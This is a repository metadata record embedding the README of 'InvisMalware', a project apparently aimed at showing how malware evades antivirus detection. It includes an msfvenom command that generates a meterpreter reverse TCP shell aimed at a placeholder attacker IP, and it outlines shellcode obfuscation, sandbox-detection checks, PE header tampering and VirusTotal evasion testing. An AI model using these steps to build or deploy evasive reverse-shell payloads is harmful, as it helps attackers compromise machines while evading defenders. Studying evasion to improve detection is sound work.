{"id":17383335,"url":"https://github.com/mawg0ud/invismalware","last_synced_at":"2025-10-16T15:31:12.595Z","repository":{"id":243037200,"uuid":"810126133","full_name":"mawg0ud/InvisMalware","owner":"mawg0ud","description":"A Malware Evasion Technique, shellcode generation, syntax modification, anti-dynamic analysis \u0026 PE header modification.","archived":false,"fork":false,"pushed_at":"2025-01-26T08:30:51.000Z","size":659,"stargazers_count":9,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-26T09:24:09.149Z","etag":null,"topics":["antivirus","cybersecurity","dynamic-analysis","exploit","infosec","malware","payload","research","security","shellcode","static-analysis","threat"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mawg0ud.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-06-04T05:18:28.000Z","updated_at":"2025-01-26T08:30:55.000Z","dependencies_parsed_at":"2024-09-14T18:52:16.936Z","dependency_job_id":"2477b8f6-e087-4c7b-aaa6-31b2ccc21e2c","html_url":"https://github.com/mawg0ud/InvisMalware","commit_stats":null,"previous_names":["mawg0ud/malware-obfuscation","mawg0ud/invismalware"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mawg0ud%2FInvisMalware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mawg0ud%2FInvisMalware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mawg0ud%2FInvisMalware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mawg0ud%2FInvisMalware/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mawg0ud","download_url":"https://codeload.github.com/mawg0ud/InvisMalware/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":236734067,"owners_count":19196249,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus","cybersecurity","dynamic-analysis","exploit","infosec","malware","payload","research","security","shellcode","static-analysis","threat"],"created_at":"2024-10-16T07:41:18.789Z","updated_at":"2025-10-16T15:31:12.086Z","avatar_url":"https://github.com/mawg0ud.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# InvisMalware: Advanced Malware Evasion Techniques\n\n## Table of Contents\n1. [Introduction](#introduction)\n2. [Features](#features)\n3. [Installation](#installation)\n4. [Usage](#usage)\n5. [Experiment Methodology](#experiment-methodology)\n6. [Testing](#testing)\n7. [Contributing](#contributing)\n8. [License](#license)\n\n---\n\n## Introduction\n**InvisMalware** is a project designed to demonstrate advanced malware evasion techniques that bypass antivirus detection. This research-driven malware experiment focuses on utilizing obfuscation methods, such as code modifications and anti-sandbox strategies, to evade static and dynamic malware detection.\n\nThis project is **for educational purposes** only, intended to provide insights into modern malware defense strategies by learning from the evasion techniques used by malicious actors.\n\n---\n\n## Features\n- **Shellcode Generation**: Create custom reverse TCP shell payloads using msfvenom.\n- **Code Obfuscation**: Modify malware code to evade antivirus detection by adding NOPs, manipulating PE headers, and more.\n- **Anti-Dynamic Analysis**: Include checks to detect sandbox environments such as audio driver and USB device presence.\n- **PE Header Manipulation**: Disguise the malware by tweaking the Portable Executable (PE) header to avoid signature-based detection.\n- **Evasion Rate Calculation**: Measure the effectiveness of evasion techniques by comparing results across various antivirus engines.\n\n---\n\n## Installation\nTo get started, clone the repository and install necessary dependencies.\n\n### Prerequisites\n- Python 3.x\n- VirtualBox/VMware (for testing in virtual environments)\n- **Metasploit Framework** (for generating shellcode)\n- **PE-bear** (for PE header manipulation)\n\n### Clone the Repository\n```bash\ngit clone https://github.com/mawg0ud/InvisMalware.git\ncd InvisMalware\n```\n\n### Install Dependencies\n```bash\npip install -r requirements.txt\n```\n\n---\n\n## Usage\n\n### 1. Generate Malware Shellcode\nUse msfvenom to generate reverse TCP shellcode:\n```bash\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=\u003cyour_ip\u003e LPORT=\u003cyour_port\u003e -f c \u003e evilexp.c\n```\n\n### 2. Modify the Shellcode\nEdit the `evilexp.c` file to obfuscate the code and avoid detection.\n\n### 3. Run in Virtual Machine\nDeploy the malware in a secure, isolated virtual machine to test its behavior and measure detection rates.\n\n### 4. Upload to VirusTotal\nUpload your malware to [VirusTotal](https://www.virustotal.com/) to evaluate its evasion rate across multiple antivirus engines.\n\n---\n\n## Experiment Methodology\nThe project follows a four-stage methodology to achieve malware evasion:\n1. **Shellcode Generation**: Create baseline reverse shellcode.\n2. **Code Modification**: Obfuscate the shellcode to evade detection.\n3. **Anti-Dynamic Analysis**: Add sandbox detection to bypass dynamic analysis tools.\n4. **PE Header Modification**: Alter the PE header to further obfuscate the malware signature.\n\n---\n\n## Testing\n### Local Testing\nRun the malware on your virtual machine equipped with antivirus software such as **Kaspersky**, **Windows Defender**, or **Bitdefender**.\n\n### VirusTotal Testing\nUpload the modified malware to **VirusTotal** and check how many antivirus engines successfully detect it.\n\n---\n\n## Contributing\nWe welcome contributions to improve the project. If you'd like to contribute:\n1. Fork the repository.\n2. Create a new branch for your feature or bug fix.\n3. Submit a pull request with detailed information about your changes.\n\n---\n\n## License\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE.txt) file for details.\n\n---\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmawg0ud%2Finvismalware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmawg0ud%2Finvismalware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmawg0ud%2Finvismalware/lists"}